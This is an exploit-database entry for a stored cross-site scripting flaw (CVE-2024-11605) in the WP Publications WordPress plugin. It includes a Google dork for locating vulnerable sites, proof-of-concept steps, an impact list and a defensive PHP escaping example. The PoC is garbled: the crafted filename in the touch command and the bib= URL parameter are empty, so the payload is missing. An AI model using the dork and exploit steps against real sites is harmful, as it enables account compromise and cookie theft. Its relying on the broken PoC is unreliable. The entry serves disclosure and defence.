WP Publications WordPress Plugin 1.2 – Stored XSS

Exploit Details

Basic Information

Exploit Title WP Publications WordPress Plugin 1.2 – Stored XSS
Exploit ID EDB-ID:52368
Type exploitdb
Published 2025-07-16T00:00:00
Modified 2025-07-16T00:00:00

CVSS Information

CVSS Score 4.8
Severity MEDIUM
Vector CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N

CVE Information

  • CVE-2024-11605

Exploit Description

Exploit Title: WP Publications WordPress Plugin…

Exploit Code

# Exploit Title: WP Publications WordPress Plugin 1.2 – Stored XSS

# Google Dork: inurl:/wp-content/plugins/wp-publications/

# Date: 2025-07-15

# Exploit Author: Zeynalxan Quliyev

# Vendor Homepage: https://wordpress.org/plugins/wp-publications/

# Software Link: https://downloads.wordpress.org/plugin/wp-publications.1.2.zip

# Version: <= 1.2
# Tested on: WordPress 6.5.3 / Linux (Apache)

# CVE: CVE-2024-11605

## Vulnerability Details

The WP Publications plugin for WordPress (versions <= 1.2) is vulnerable to a **Stored Cross-Site Scripting (XSS)** attack. The vulnerability exists because the plugin fails to escape filenames before outputting them in the HTML, allowing high-privileged users (such as admins) to inject arbitrary JavaScript code. This vulnerability is exploitable even in WordPress configurations where the `unfiltered_html` capability is disabled (e.g., multisite setups).

---

## Proof of Concept (PoC)

1. SSH into the server and navigate to the plugin directory:

```bash
cd /var/www/html/wp-content/plugins/wp-publications/
```

2. Run the following command to create a malicious BibTeX file:

```bash
touch ".bib"
```

3. Access the plugin’s BibTeX browser via the following URL:

```
https://example.com/wp-content/plugins/wp-publications/bibtexbrowser.php?frameset&bib=
```

4. The injected JavaScript will be executed, triggering the XSS payload:

```javascript
alert('XSS');
```

## Impact

* Stored XSS (JavaScript) is executed in the context of the admin panel.

* Bypasses `unfiltered_html` protection in multisite environments.

* Can be used for privilege escalation, cookie theft, or injecting malicious content.

## Recommendation

Update to a version of the plugin that properly escapes file names before rendering them in the output. If no update is available, disable the plugin or sanitize file inputs manually.
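
The escaping this recommendation calls for, shown as an added example (it is not the plugin's code or its patch): a file name is escaped for its output context, and the `bib` request parameter is resolved against a strict allowlist before use. The function names, the name pattern and the sample file name are assumptions made for illustration.

```php
<?php
// Added example; function names are hypothetical, not taken from the plugin.

// Vulnerable pattern: the file name reaches the markup unescaped,
// so any markup characters in the name are parsed as HTML.
function render_bib_link_unsafe(string $file): string {
    return '<a href="?bib=' . $file . '">' . $file . '</a>';
}

// Hardened pattern: URL-encode the name for the query string, then
// HTML-escape for the attribute and text contexts. Inside WordPress,
// esc_attr() and esc_html() serve the same purpose.
function render_bib_link_safe(string $file): string {
    $flags = ENT_QUOTES | ENT_SUBSTITUTE;
    $href  = '?bib=' . rawurlencode($file);
    return '<a href="' . htmlspecialchars($href, $flags, 'UTF-8') . '">'
         . htmlspecialchars($file, $flags, 'UTF-8') . '</a>';
}

// Defence in depth: accept only plain *.bib names (assumed pattern)
// that resolve to an existing file inside the expected directory.
function resolve_bib(string $requested, string $dir): ?string {
    $name = basename($requested);
    if (!preg_match('/\A[A-Za-z0-9][A-Za-z0-9._-]{0,127}\.bib\z/', $name)) {
        return null;
    }
    $base = realpath($dir);
    $path = realpath($dir . DIRECTORY_SEPARATOR . $name);
    if ($base === false || $path === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

// Constructed sample: a benign file name containing markup characters.
$sample = '<u>refs.bib';
echo render_bib_link_unsafe($sample), PHP_EOL; // markup passes through
echo render_bib_link_safe($sample), PHP_EOL;   // markup is neutralised
var_dump(resolve_bib($sample, sys_get_temp_dir())); // rejected by allowlist
```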

## References

* [CVE-2024-11605 on NVD](https://nvd.nist.gov/vuln/detail/CVE-2024-11605)

* [WP Plugin Page](https://wordpress.org/plugins/wp-publications/)
